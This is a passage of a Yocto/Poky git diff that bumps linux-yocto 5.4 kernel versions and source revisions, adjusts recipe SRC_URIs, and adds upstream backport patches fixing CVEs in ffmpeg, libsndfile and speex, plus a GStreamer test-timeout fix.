file://LICENCE.xc4000;md5=0ff51d2dc49fce04814c9155081092f0 \ file://LICENCE.xc5000;md5=1e170c13175323c32c7f4d0998d53f66 \ file://LICENCE.xc5000c;md5=12b02efa3049db65d524aeb418dd87ca \ - file://WHENCE;md5=727d0d4e2d420f41d89d098f6322e779 \ + file://WHENCE;md5=79f477f9d53eedee5a65b45193785963 \ " # These are not common licenses, set NO_GENERIC_LICENSE for them @@ -205,7 +205,7 @@ PE = "1" SRC_URI = "${KERNELORG_MIRROR}/linux/kernel/firmware/${BPN}-${PV}.tar.xz" -SRC_URI[sha256sum] = "2aa6ae8b9808408f9811ac38f00c188e53e984a2b3990254f6c9c02c1ab13417" +SRC_URI[sha256sum] = "eeddb4e6bef31fd1a3757f12ccc324929bbad97855c0b9ec5ed780f74de1837d" inherit allarch diff --git a/poky/meta/recipes-kernel/linux/linux-yocto-rt_5.4.bb b/poky/meta/recipes-kernel/linux/linux-yocto-rt_5.4.bb index 53e6982619..9e8281c7a1 100644 --- a/poky/meta/recipes-kernel/linux/linux-yocto-rt_5.4.bb +++ b/poky/meta/recipes-kernel/linux/linux-yocto-rt_5.4.bb @@ -11,13 +11,13 @@ python () { raise bb.parse.SkipRecipe("Set PREFERRED_PROVIDER_virtual/kernel to linux-yocto-rt to enable it") } -SRCREV_machine ?= "e823f31a48749bf1d01a86c274fcec87fae1e5ba" -SRCREV_meta ?= "71f799f448d405a35d88ecee0aba3ec2b198d542" +SRCREV_machine ?= "e92d76afe6d8592917c0e7b948912c085e661df2" +SRCREV_meta ?= "98cce1c95fcc9a26965cbc5f038fd71d53c387c8" SRC_URI = "git://git.yoctoproject.org/linux-yocto.git;branch=${KBRANCH};name=machine \ git://git.yoctoproject.org/yocto-kernel-cache;type=kmeta;name=meta;branch=yocto-5.4;destsuffix=${KMETA}" -LINUX_VERSION ?= "5.4.141" +LINUX_VERSION ?= "5.4.172" LIC_FILES_CHKSUM = "file://COPYING;md5=bbea815ee2795b2f4230826c0c6b8814" diff --git a/poky/meta/recipes-kernel/linux/linux-yocto-tiny_5.4.bb b/poky/meta/recipes-kernel/linux/linux-yocto-tiny_5.4.bb index 44a033d5cb..a75570df93 100644 --- a/poky/meta/recipes-kernel/linux/linux-yocto-tiny_5.4.bb +++ b/poky/meta/recipes-kernel/linux/linux-yocto-tiny_5.4.bb @@ -6,7 +6,7 @@ KCONFIG_MODE = "--allnoconfig" require recipes-kernel/linux/linux-yocto.inc -LINUX_VERSION ?= "5.4.141" +LINUX_VERSION ?= "5.4.172" LIC_FILES_CHKSUM = "file://COPYING;md5=bbea815ee2795b2f4230826c0c6b8814" DEPENDS += "${@bb.utils.contains('ARCH', 'x86', 'elfutils-native', '', d)}" @@ -15,9 +15,9 @@ DEPENDS += "openssl-native util-linux-native" KMETA = "kernel-meta" KCONF_BSP_AUDIT_LEVEL = "2" -SRCREV_machine_qemuarm ?= "63d08f6ee3425e9d94eccf3a75a9ec4e474df916" -SRCREV_machine ?= "05b2de44f781a297be454242d77f619189dfc6f4" -SRCREV_meta ?= "71f799f448d405a35d88ecee0aba3ec2b198d542" +SRCREV_machine_qemuarm ?= "10b4756eee78aa43ff9ed64da700ec6e8d97ff22" +SRCREV_machine ?= "6ab93fdc53b64e146e4f16363375c1beb37b82e4" +SRCREV_meta ?= "98cce1c95fcc9a26965cbc5f038fd71d53c387c8" PV = "${LINUX_VERSION}+git${SRCPV}" diff --git a/poky/meta/recipes-kernel/linux/linux-yocto_5.4.bb b/poky/meta/recipes-kernel/linux/linux-yocto_5.4.bb index 0e41d734df..2d7f7559e5 100644 --- a/poky/meta/recipes-kernel/linux/linux-yocto_5.4.bb +++ b/poky/meta/recipes-kernel/linux/linux-yocto_5.4.bb @@ -12,16 +12,16 @@ KBRANCH_qemux86 ?= "v5.4/standard/base" KBRANCH_qemux86-64 ?= "v5.4/standard/base" KBRANCH_qemumips64 ?= "v5.4/standard/mti-malta64" -SRCREV_machine_qemuarm ?= "91a35a54a7b2d4d558b3f8b24c39657a3ff71c7c" -SRCREV_machine_qemuarm64 ?= "a8edc7f1b004c6fb56d142fba3e688ba2a051b54" -SRCREV_machine_qemumips ?= "4f1c4fc19e8d2cb994dac34fb8bb32a7c776b318" -SRCREV_machine_qemuppc ?= "7bb64db24c2b7bd2b6656036009bd71618eb125d" -SRCREV_machine_qemuriscv64 ?= "13fa9f66484db2492ee09667f45ad3e52e5b35ac" -SRCREV_machine_qemux86 ?= "13fa9f66484db2492ee09667f45ad3e52e5b35ac" -SRCREV_machine_qemux86-64 ?= "13fa9f66484db2492ee09667f45ad3e52e5b35ac" -SRCREV_machine_qemumips64 ?= "931ad0c17451151dd3ddfb27dc2e33965f90ce86" -SRCREV_machine ?= "13fa9f66484db2492ee09667f45ad3e52e5b35ac" -SRCREV_meta ?= "71f799f448d405a35d88ecee0aba3ec2b198d542" +SRCREV_machine_qemuarm ?= "8de1da3dc354dedef2e435e694eec6d6e72c9822" +SRCREV_machine_qemuarm64 ?= "eed7c0a64f3a7a91a130bc2e507304dc8b446a31" +SRCREV_machine_qemumips ?= "996a9660e4fab70db5cecec9c831141cd03c3d36" +SRCREV_machine_qemuppc ?= "0197cf5754b1bd4eb035c342af9cc27e8c3339ca" +SRCREV_machine_qemuriscv64 ?= "c6b015510134942076c0e111e56357656acf3dd5" +SRCREV_machine_qemux86 ?= "c6b015510134942076c0e111e56357656acf3dd5" +SRCREV_machine_qemux86-64 ?= "c6b015510134942076c0e111e56357656acf3dd5" +SRCREV_machine_qemumips64 ?= "fe2769a7c268ed224ec70fd2aaab850e4eef70dc" +SRCREV_machine ?= "c6b015510134942076c0e111e56357656acf3dd5" +SRCREV_meta ?= "98cce1c95fcc9a26965cbc5f038fd71d53c387c8" # remap qemuarm to qemuarma15 for the 5.4 kernel # KMACHINE_qemuarm ?= "qemuarma15" @@ -30,7 +30,7 @@ SRC_URI = "git://git.yoctoproject.org/linux-yocto.git;name=machine;branch=${KBRA git://git.yoctoproject.org/yocto-kernel-cache;type=kmeta;name=meta;branch=yocto-5.4;destsuffix=${KMETA}" LIC_FILES_CHKSUM = "file://COPYING;md5=bbea815ee2795b2f4230826c0c6b8814" -LINUX_VERSION ?= "5.4.141" +LINUX_VERSION ?= "5.4.172" DEPENDS += "${@bb.utils.contains('ARCH', 'x86', 'elfutils-native', '', d)}" DEPENDS += "openssl-native util-linux-native" diff --git a/poky/meta/recipes-kernel/lttng/lttng-modules_2.11.6.bb b/poky/meta/recipes-kernel/lttng/lttng-modules_2.11.6.bb index 3fdc8094e9..3145f0298c 100644 --- a/poky/meta/recipes-kernel/lttng/lttng-modules_2.11.6.bb +++ b/poky/meta/recipes-kernel/lttng/lttng-modules_2.11.6.bb @@ -39,7 +39,9 @@ EXTRA_OEMAKE += "KERNELDIR='${STAGING_KERNEL_DIR}'" do_install_append() { # Delete empty directories to avoid QA failures if no modules were built - find ${D}/${nonarch_base_libdir} -depth -type d -empty -exec rmdir {} \; + if [ -d ${D}/${nonarch_base_libdir} ]; then + find ${D}/${nonarch_base_libdir} -depth -type d -empty -exec rmdir {} \; + fi } python do_package_prepend() { diff --git a/poky/meta/recipes-kernel/lttng/lttng-tools_2.11.5.bb b/poky/meta/recipes-kernel/lttng/lttng-tools_2.11.5.bb index e830475d0d..6306193809 100644 --- a/poky/meta/recipes-kernel/lttng/lttng-tools_2.11.5.bb +++ b/poky/meta/recipes-kernel/lttng/lttng-tools_2.11.5.bb @@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=01d7fc4496aacf37d90df90b90b0cac1 \ file://gpl-2.0.txt;md5=b234ee4d69f5fce4486a80fdaf4a4263 \ file://lgpl-2.1.txt;md5=0f0d71500e6a57fd24d825f33242b9ca" -DEPENDS = "liburcu popt libxml2 util-linux" +DEPENDS = "liburcu popt libxml2 util-linux bison-native" RDEPENDS_${PN} = "libgcc" RDEPENDS_${PN}-ptest += "make perl bash gawk babeltrace procps perl-module-overloading coreutils util-linux kmod lttng-modules sed python3-core" RDEPENDS_${PN}-ptest_append_libc-glibc = " glibc-utils" diff --git a/poky/meta/recipes-kernel/make-mod-scripts/make-mod-scripts_1.0.bb b/poky/meta/recipes-kernel/make-mod-scripts/make-mod-scripts_1.0.bb index b58fa9a603..f9df345ca5 100644 --- a/poky/meta/recipes-kernel/make-mod-scripts/make-mod-scripts_1.0.bb +++ b/poky/meta/recipes-kernel/make-mod-scripts/make-mod-scripts_1.0.bb @@ -19,7 +19,7 @@ DEPENDS += "bc-native bison-native" DEPENDS += "gmp-native" EXTRA_OEMAKE = " HOSTCC="${BUILD_CC} ${BUILD_CFLAGS} ${BUILD_LDFLAGS}" HOSTCPP="${BUILD_CPP}"" -EXTRA_OEMAKE += " HOSTCXX="${BUILD_CXX} ${BUILD_CXXFLAGS} ${BUILD_LDFLAGS}"" +EXTRA_OEMAKE += " HOSTCXX="${BUILD_CXX} ${BUILD_CXXFLAGS} ${BUILD_LDFLAGS}" CROSS_COMPILE=${TARGET_PREFIX}" # Build some host tools under work-shared. CC, LD, and AR are probably # not used, but this is the historical way of invoking "make scripts". diff --git a/poky/meta/recipes-kernel/powertop/powertop_2.10.bb b/poky/meta/recipes-kernel/powertop/powertop_2.10.bb index ffa3b4685c..dcbba2fd5c 100644 --- a/poky/meta/recipes-kernel/powertop/powertop_2.10.bb +++ b/poky/meta/recipes-kernel/powertop/powertop_2.10.bb @@ -6,7 +6,7 @@ DEPENDS = "ncurses libnl pciutils autoconf-archive" LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e" -SRC_URI = "git://github.com/fenrus75/powertop;protocol=https \ +SRC_URI = "git://github.com/fenrus75/powertop;protocol=https;branch=master \ file://0001-wakeup_xxx.h-include-limits.h.patch \ file://0002-configure.ac-ax_add_fortify_source.patch \ file://0003-configure-Use-AX_REQUIRE_DEFINED.patch \ diff --git a/poky/meta/recipes-kernel/systemtap/systemtap_git.inc b/poky/meta/recipes-kernel/systemtap/systemtap_git.inc index 116e83fe0f..af55f15fd4 100644 --- a/poky/meta/recipes-kernel/systemtap/systemtap_git.inc +++ b/poky/meta/recipes-kernel/systemtap/systemtap_git.inc @@ -3,7 +3,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" SRCREV = "044a0640985ef007c0b2fb6eaf660d9d51800cda" PV = "4.2" -SRC_URI = "git://sourceware.org/git/systemtap.git \ +SRC_URI = "git://sourceware.org/git/systemtap.git;branch=master \ file://0001-Do-not-let-configure-write-a-python-location-into-th.patch \ file://0001-Install-python-modules-to-correct-library-dir.patch \ file://0001-staprun-stapbpf-don-t-support-installing-a-non-root.patch \ diff --git a/poky/meta/recipes-kernel/wireless-regdb/wireless-regdb_2021.04.21.bb b/poky/meta/recipes-kernel/wireless-regdb/wireless-regdb_2021.08.28.bb index f79c0b29ea..376311804e 100644 --- a/poky/meta/recipes-kernel/wireless-regdb/wireless-regdb_2021.04.21.bb +++ b/poky/meta/recipes-kernel/wireless-regdb/wireless-regdb_2021.08.28.bb @@ -5,7 +5,7 @@ LICENSE = "ISC" LIC_FILES_CHKSUM = "file://LICENSE;md5=07c4f6dea3845b02a18dc00c8c87699c" SRC_URI = "https://www.kernel.org/pub/software/network/${BPN}/${BP}.tar.xz" -SRC_URI[sha256sum] = "9e4c02b2a9710df4dbdb327c39612e8cbbae6495987afeddaebab28c1ea3d8fa" +SRC_URI[sha256sum] = "cff370c410d1e6d316ae0a7fa8ac6278fdf1efca5d3d664aca7cfd2aafa54446" inherit bin_package allarch diff --git a/poky/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-3566.patch b/poky/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-3566.patch new file mode 100644 index 0000000000..abfc024820 --- /dev/null +++ b/poky/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-3566.patch @@ -0,0 +1,61 @@ +From 3bce9e9b3ea35c54bacccc793d7da99ea5157532 Mon Sep 17 00:00:00 2001 +From: Paul B Mahol <onemda@gmail.com> +Date: Mon, 27 Jan 2020 21:53:08 +0100 +Subject: [PATCH] avformat/tty: add probe function + +CVE: CVE-2021-3566 +Signed-off-by: Saloni Jain <salonij@kpit.com> + +Upstream-Status: Backport [http://git.videolan.org/?p=ffmpeg.git;a=patch;h=3bce9e9b3ea35c54bacccc793d7da99ea5157532] +Comment: No changes/refreshing done. +--- + libavformat/tty.c | 21 ++++++++++++++++++++- + 1 file changed, 20 insertions(+), 1 deletion(-) + +diff --git a/libavformat/tty.c b/libavformat/tty.c +index 8d48f2c45c12..60f7e9f87ee7 100644 +--- a/libavformat/tty.c ++++ b/libavformat/tty.c +@@ -34,6 +34,13 @@ + #include "internal.h" + #include "sauce.h" + ++static int isansicode(int x) ++{ ++ return x == 0x1B || x == 0x0A || x == 0x0D || (x >= 0x20 && x < 0x7f); ++} ++ ++static const char tty_extensions[31] = "ans,art,asc,diz,ice,nfo,txt,vt"; ++ + typedef struct TtyDemuxContext { + AVClass *class; + int chars_per_frame; +@@ -42,6 +49,17 @@ typedef struct TtyDemuxContext { + AVRational framerate; /**< Set by a private option. */ + } TtyDemuxContext; + ++static int read_probe(const AVProbeData *p) ++{ ++ int cnt = 0; ++ ++ for (int i = 0; i < p->buf_size; i++) ++ cnt += !!isansicode(p->buf[i]); ++ ++ return (cnt * 100LL / p->buf_size) * (cnt > 400) * ++ !!av_match_ext(p->filename, tty_extensions); ++} ++ + /** + * Parse EFI header + */ +@@ -153,8 +171,9 @@ AVInputFormat ff_tty_demuxer = { + .name = "tty", + .long_name = NULL_IF_CONFIG_SMALL("Tele-typewriter"), + .priv_data_size = sizeof(TtyDemuxContext), ++ .read_probe = read_probe, + .read_header = read_header, + .read_packet = read_packet, +- .extensions = "ans,art,asc,diz,ice,nfo,txt,vt", ++ .extensions = tty_extensions, + .priv_class = &tty_demuxer_class, + }; diff --git a/poky/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-38291.patch b/poky/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-38291.patch new file mode 100644 index 0000000000..e5be985fc3 --- /dev/null +++ b/poky/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-38291.patch @@ -0,0 +1,53 @@ +From e01d306c647b5827102260b885faa223b646d2d1 Mon Sep 17 00:00:00 2001 +From: James Almer <jamrial@gmail.com> +Date: Wed, 21 Jul 2021 01:02:44 -0300 +Subject: [PATCH] avcodec/utils: don't return negative values in + av_get_audio_frame_duration() + +In some extrme cases, like with adpcm_ms samples with an extremely high channel +count, get_audio_frame_duration() may return a negative frame duration value. +Don't propagate it, and instead return 0, signaling that a duration could not +be determined. + +CVE: CVE-2021-3566 +Fixes ticket #9312 +Signed-off-by: James Almer <jamrial@gmail.com> +Signed-off-by: Saloni Jain <salonij@kpit.com> + +Upstream-Status: Backport [http://git.videolan.org/?p=ffmpeg.git;a=patch;h=e01d306c647b5827102260b885faa223b646d2d1] +Comment: No changes/refreshing done. +--- + libavcodec/utils.c | 6 ++++-- + 1 file changed, 4 insertions(+), 2 deletions(-) + +diff --git a/libavcodec/utils.c b/libavcodec/utils.c +index 5fad782f5a..cfc07cbcb8 100644 +--- a/libavcodec/utils.c ++++ b/libavcodec/utils.c +@@ -810,20 +810,22 @@ static int get_audio_frame_duration(enum AVCodecID id, int sr, int ch, int ba, + + int av_get_audio_frame_duration(AVCodecContext *avctx, int frame_bytes) + { +- return get_audio_frame_duration(avctx->codec_id, avctx->sample_rate, ++ int duration = get_audio_frame_duration(avctx->codec_id, avctx->sample_rate, + avctx->channels, avctx->block_align, + avctx->codec_tag, avctx->bits_per_coded_sample, + avctx->bit_rate, avctx->extradata, avctx->frame_size, + frame_bytes); ++ return FFMAX(0, duration); + } + + int av_get_audio_frame_duration2(AVCodecParameters *par, int frame_bytes) + { +- return get_audio_frame_duration(par->codec_id, par->sample_rate, ++ int duration = get_audio_frame_duration(par->codec_id, par->sample_rate, + par->channels, par->block_align, + par->codec_tag, par->bits_per_coded_sample, + par->bit_rate, par->extradata, par->frame_size, + frame_bytes); ++ return FFMAX(0, duration); + } + + #if !HAVE_THREADS +-- +2.20.1 diff --git a/poky/meta/recipes-multimedia/ffmpeg/ffmpeg_4.2.2.bb b/poky/meta/recipes-multimedia/ffmpeg/ffmpeg_4.2.2.bb index 0e359848fa..1d6f2e528b 100644 --- a/poky/meta/recipes-multimedia/ffmpeg/ffmpeg_4.2.2.bb +++ b/poky/meta/recipes-multimedia/ffmpeg/ffmpeg_4.2.2.bb @@ -27,7 +27,9 @@ SRC_URI = "https://www.ffmpeg.org/releases/${BP}.tar.xz \ file://mips64_cpu_detection.patch \ file://CVE-2020-12284.patch \ file://0001-libavutil-include-assembly-with-full-path-from-sourc.patch \ - " + file://CVE-2021-3566.patch \ + file://CVE-2021-38291.patch \ + " SRC_URI[md5sum] = "348956fc2faa57a2f79bbb84ded9fbc3" SRC_URI[sha256sum] = "cb754255ab0ee2ea5f66f8850e1bd6ad5cac1cd855d0a2f4990fb8c668b0d29c" diff --git a/poky/meta/recipes-multimedia/gstreamer/gst-examples_1.16.0.bb b/poky/meta/recipes-multimedia/gstreamer/gst-examples_1.16.0.bb index af79a6f952..6494013e3f 100644 --- a/poky/meta/recipes-multimedia/gstreamer/gst-examples_1.16.0.bb +++ b/poky/meta/recipes-multimedia/gstreamer/gst-examples_1.16.0.bb @@ -7,7 +7,7 @@ LIC_FILES_CHKSUM = "file://playback/player/gtk/gtk-play.c;beginline=1;endline=20 DEPENDS = "glib-2.0 gstreamer1.0 gstreamer1.0-plugins-base gstreamer1.0-plugins-bad gtk+3 glib-2.0-native" -SRC_URI = "git://gitlab.freedesktop.org/gstreamer/gst-examples.git;protocol=https \ +SRC_URI = "git://gitlab.freedesktop.org/gstreamer/gst-examples.git;protocol=https;branch=master \ file://0001-Make-player-examples-installable.patch \ file://gst-player.desktop \ " diff --git a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0/0006-tests-seek-Don-t-use-too-strict-timeout-for-validati.patch b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0/0006-tests-seek-Don-t-use-too-strict-timeout-for-validati.patch new file mode 100644 index 0000000000..e32f3c101f --- /dev/null +++ b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0/0006-tests-seek-Don-t-use-too-strict-timeout-for-validati.patch @@ -0,0 +1,33 @@ +From 1db36347d05d88835519368442e9aa89c64091ad Mon Sep 17 00:00:00 2001 +From: Seungha Yang <seungha@centricular.com> +Date: Tue, 15 Sep 2020 00:54:58 +0900 +Subject: [PATCH] tests: seek: Don't use too strict timeout for validation + +Expected segment-done message might not be seen within expected +time if system is not powerful enough. + +Part-of: <https://gitlab.freedesktop.org/gstreamer/gstreamer/-/merge_requests/625> + +Upstream-Status: Backport [https://cgit.freedesktop.org/gstreamer/gstreamer/commit?id=f44312ae5d831438fcf8041162079c65321c588c] +Signed-off-by: Anuj Mittal <anuj.mittal@intel.com> +Signed-off-by: Jose Quaresma <quaresma.jose@gmail.com> +--- + tests/check/pipelines/seek.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/tests/check/pipelines/seek.c b/tests/check/pipelines/seek.c +index 28bb8846d..5f7447bc5 100644 +--- a/tests/check/pipelines/seek.c ++++ b/tests/check/pipelines/seek.c +@@ -521,7 +521,7 @@ GST_START_TEST (test_loopback_2) + + GST_INFO ("wait for segment done message"); + +- msg = gst_bus_timed_pop_filtered (bus, (GstClockTime) 2 * GST_SECOND, ++ msg = gst_bus_timed_pop_filtered (bus, GST_CLOCK_TIME_NONE, + GST_MESSAGE_SEGMENT_DONE | GST_MESSAGE_ERROR); + fail_unless (msg, "no message within the timed window"); + fail_unless_equals_string (GST_MESSAGE_TYPE_NAME (msg), "segment-done"); +-- +2.29.2 + diff --git a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.16.3.bb b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.16.3.bb index a516fabdaf..236d6034d6 100644 --- a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.16.3.bb +++ b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.16.3.bb @@ -22,6 +22,7 @@ SRC_URI = " \ file://0003-meson-Add-valgrind-feature.patch \ file://0004-meson-Add-option-for-installed-tests.patch \ file://0005-bufferpool-only-resize-in-reset-when-maxsize-is-larger.patch \ + file://0006-tests-seek-Don-t-use-too-strict-timeout-for-validati.patch \ " SRC_URI[md5sum] = "beecf6965a17fb17fa3b262fd36df70a" SRC_URI[sha256sum] = "692f037968e454e508b0f71d9674e2e26c78475021407fcf8193b1c7e59543c7" diff --git a/poky/meta/recipes-multimedia/libsamplerate/libsamplerate0/shared_version_info.patch b/poky/meta/recipes-multimedia/libsamplerate/libsamplerate0/shared_version_info.patch new file mode 100644 index 0000000000..b42d564b4b --- /dev/null +++ b/poky/meta/recipes-multimedia/libsamplerate/libsamplerate0/shared_version_info.patch @@ -0,0 +1,13 @@ +Index: libsamplerate-0.1.8/configure.ac +=================================================================== +--- libsamplerate-0.1.8.orig/configure.ac ++++ libsamplerate-0.1.8/configure.ac +@@ -53,7 +53,7 @@ AC_PROG_LN_S + # 6. If any interfaces have been removed since the last public release, then set age + # to 0. + +-SHARED_VERSION_INFO="1:8:1" ++SHARED_VERSION_INFO="1:9:1" + + + diff --git a/poky/meta/recipes-multimedia/libsamplerate/libsamplerate0_0.1.9.bb b/poky/meta/recipes-multimedia/libsamplerate/libsamplerate0_0.1.9.bb index 6dfc42b436..8345d6880f 100644 --- a/poky/meta/recipes-multimedia/libsamplerate/libsamplerate0_0.1.9.bb +++ b/poky/meta/recipes-multimedia/libsamplerate/libsamplerate0_0.1.9.bb @@ -10,6 +10,7 @@ PR = "r1" SRC_URI = "http://www.mega-nerd.com/SRC/libsamplerate-${PV}.tar.gz \ file://0001-configure.ac-improve-alsa-handling.patch \ + file://shared_version_info.patch \ " SRC_URI[md5sum] = "2b78ae9fe63b36b9fbb6267fad93f259" diff --git a/poky/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_1.patch b/poky/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_1.patch new file mode 100644 index 0000000000..6354f856cb --- /dev/null +++ b/poky/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_1.patch @@ -0,0 +1,36 @@ +From a9815b3f228df00086e0a40bcc43162fc19896a1 Mon Sep 17 00:00:00 2001 +From: bobsayshilol <bobsayshilol@live.co.uk> +Date: Wed, 17 Feb 2021 23:21:48 +0000 +Subject: [PATCH 1/2] wavlike: Fix incorrect size check + +The SF_CART_INFO_16K struct has an additional 4 byte field to hold +the size of 'tag_text' which the file header doesn't, so don't +include it as part of the check when looking for the max length. + +https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=26026 + +Upstream-Status: Backport +CVE: CVE-2021-3246 patch 1 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + src/wavlike.c | 6 +++++- + 1 file changed, 5 insertions(+), 1 deletion(-) + +Index: libsndfile-1.0.28/src/wavlike.c +=================================================================== +--- libsndfile-1.0.28.orig/src/wavlike.c ++++ libsndfile-1.0.28/src/wavlike.c +@@ -803,7 +803,11 @@ wavlike_read_cart_chunk (SF_PRIVATE *psf + return 0 ; + } ; + +- if (chunksize >= sizeof (SF_CART_INFO_16K)) ++ /* ++ ** SF_CART_INFO_16K has an extra field 'tag_text_size' that isn't part ++ ** of the chunk, so don't include it in the size check. ++ */ ++ if (chunksize >= sizeof (SF_CART_INFO_16K) - 4) + { psf_log_printf (psf, "cart : %u too big to be handled\n", chunksize) ; + psf_binheader_readf (psf, "j", chunksize) ; + return 0 ; diff --git a/poky/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_2.patch b/poky/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_2.patch new file mode 100644 index 0000000000..d6b03d7d4d --- /dev/null +++ b/poky/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_2.patch @@ -0,0 +1,44 @@ +From deb669ee8be55a94565f6f8a6b60890c2e7c6f32 Mon Sep 17 00:00:00 2001 +From: bobsayshilol <bobsayshilol@live.co.uk> +Date: Thu, 18 Feb 2021 21:52:09 +0000 +Subject: [PATCH 2/2] ms_adpcm: Fix and extend size checks + +'blockalign' is the size of a block, and each block contains 7 samples +per channel as part of the preamble, so check against 'samplesperblock' +rather than 'blockalign'. Also add an additional check that the block +is big enough to hold the samples it claims to hold. + +https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=26803 + +Upstream-Status: Backport +CVE: CVE-2021-3246 patch 2 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + src/ms_adpcm.c | 10 ++++++++-- + 1 file changed, 8 insertions(+), 2 deletions(-) + +diff --git a/src/ms_adpcm.c b/src/ms_adpcm.c +index 5e8f1a31..a21cb994 100644 +--- a/src/ms_adpcm.c ++++ b/src/ms_adpcm.c +@@ -128,8 +128,14 @@ wavlike_msadpcm_init (SF_PRIVATE *psf, int blockalign, int samplesperblock) + if (psf->file.mode == SFM_WRITE) + samplesperblock = 2 + 2 * (blockalign - 7 * psf->sf.channels) / psf->sf.channels ; + +- if (blockalign < 7 * psf->sf.channels) +- { psf_log_printf (psf, "*** Error blockalign (%d) should be > %d.\n", blockalign, 7 * psf->sf.channels) ; ++ /* There's 7 samples per channel in the preamble of each block */ ++ if (samplesperblock < 7 * psf->sf.channels) ++ { psf_log_printf (psf, "*** Error samplesperblock (%d) should be >= %d.\n", samplesperblock, 7 * psf->sf.channels) ; ++ return SFE_INTERNAL ; ++ } ; ++ ++ if (2 * blockalign < samplesperblock * psf->sf.channels) ++ { psf_log_printf (psf, "*** Error blockalign (%d) should be >= %d.\n", blockalign, samplesperblock * psf->sf.channels / 2) ; + return SFE_INTERNAL ; + } ; + +-- +2.25.1 + diff --git a/poky/meta/recipes-multimedia/libsndfile/libsndfile1_1.0.28.bb b/poky/meta/recipes-multimedia/libsndfile/libsndfile1_1.0.28.bb index 044881a859..2525af8fe0 100644 --- a/poky/meta/recipes-multimedia/libsndfile/libsndfile1_1.0.28.bb +++ b/poky/meta/recipes-multimedia/libsndfile/libsndfile1_1.0.28.bb @@ -20,6 +20,8 @@ SRC_URI = "http://www.mega-nerd.com/libsndfile/files/libsndfile-${PV}.tar.gz \ file://CVE-2017-12562.patch \ file://CVE-2018-19758.patch \ file://CVE-2019-3832.patch \ + file://CVE-2021-3246_1.patch \ + file://CVE-2021-3246_2.patch \ " SRC_URI[md5sum] = "646b5f98ce89ac60cdb060fcd398247c" diff --git a/poky/meta/recipes-multimedia/speex/speex/CVE-2020-23903.patch b/poky/meta/recipes-multimedia/speex/speex/CVE-2020-23903.patch new file mode 100644 index 0000000000..eb16e95ffc --- /dev/null +++ b/poky/meta/recipes-multimedia/speex/speex/CVE-2020-23903.patch @@ -0,0 +1,30 @@ +Backport patch to fix CVE-2020-23903. + +CVE: CVE-2020-23903 +Upstream-Status: Backport [https://github.com/xiph/speex/commit/870ff84] + +Signed-off-by: Kai Kang <kai.kang@windriver.com> + +From 870ff845b32f314aec0036641ffe18aba4916887 Mon Sep 17 00:00:00 2001 +From: Tristan Matthews <tmatth@videolan.org> +Date: Mon, 13 Jul 2020 23:25:03 -0400 +Subject: [PATCH] wav_io: guard against invalid channel numbers + +Fixes #13 +--- + src/wav_io.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/src/wav_io.c b/src/wav_io.c +index b5183015..09d62eb0 100644 +--- a/src/wav_io.c ++++ b/src/wav_io.c +@@ -111,7 +111,7 @@ int read_wav_header(FILE *file, int *rate, int *channels, int *format, spx_int32 + stmp = le_short(stmp); + *channels = stmp; + +- if (stmp>2) ++ if (stmp>2 || stmp<1) + { + fprintf (stderr, "Only mono and (intensity) stereo supported\n"); + return -1; diff --git a/poky/meta/recipes-multimedia/speex/speex_1.2.0.bb b/poky/meta/recipes-multimedia/speex/speex_1.2.0.bb index 3a0911d6f8..ea475f0f1b 100644 --- a/poky/meta/recipes-multimedia/speex/speex_1.2.0.bb +++ b/poky/meta/recipes-multimedia/speex/speex_1.2.0.bb @@ -7,7 +7,9 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=314649d8ba9dd7045dfb6683f298d0a8 \ file://include/speex/speex.h;beginline=1;endline=34;md5=ef8c8ea4f7198d71cf3509c6ed05ea50" DEPENDS = "libogg speexdsp" -SRC_URI = "http://downloads.xiph.org/releases/speex/speex-${PV}.tar.gz" +SRC_URI = "http://downloads.xiph.org/releases/speex/speex-${PV}.tar.gz \ + file://CVE-2020-23903.patch \ + " UPSTREAM_CHECK_REGEX = "speex-(?P<pver>\d+(\.\d+)+)\.tar" SRC_URI[md5sum] = "8ab7bb2589110dfaf0ed7fa7757dc49c" diff --git a/poky/meta/recipes-multimedia/x264/x264_git.bb b/poky/meta/recipes-multimedia/x264/x264_git.bb index 39429a8809..6789646833 100644 --- a/poky/meta/recipes-multimedia/x264/x264_git.bb +++ b/poky/meta/recipes-multimedia/x264/x264_git.bb @@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f" DEPENDS = "nasm-native" -SRC_URI = "git://github.com/mirror/x264;branch=stable \ +SRC_URI = "git://github.com/mirror/x264;branch=stable;protocol=https \ file://don-t-default-to-cortex-a9-with-neon.patch \ file://Fix-X32-build-by-disabling-asm.patch \ " diff --git a/poky/meta/recipes-rt/rt-tests/rt-tests.inc 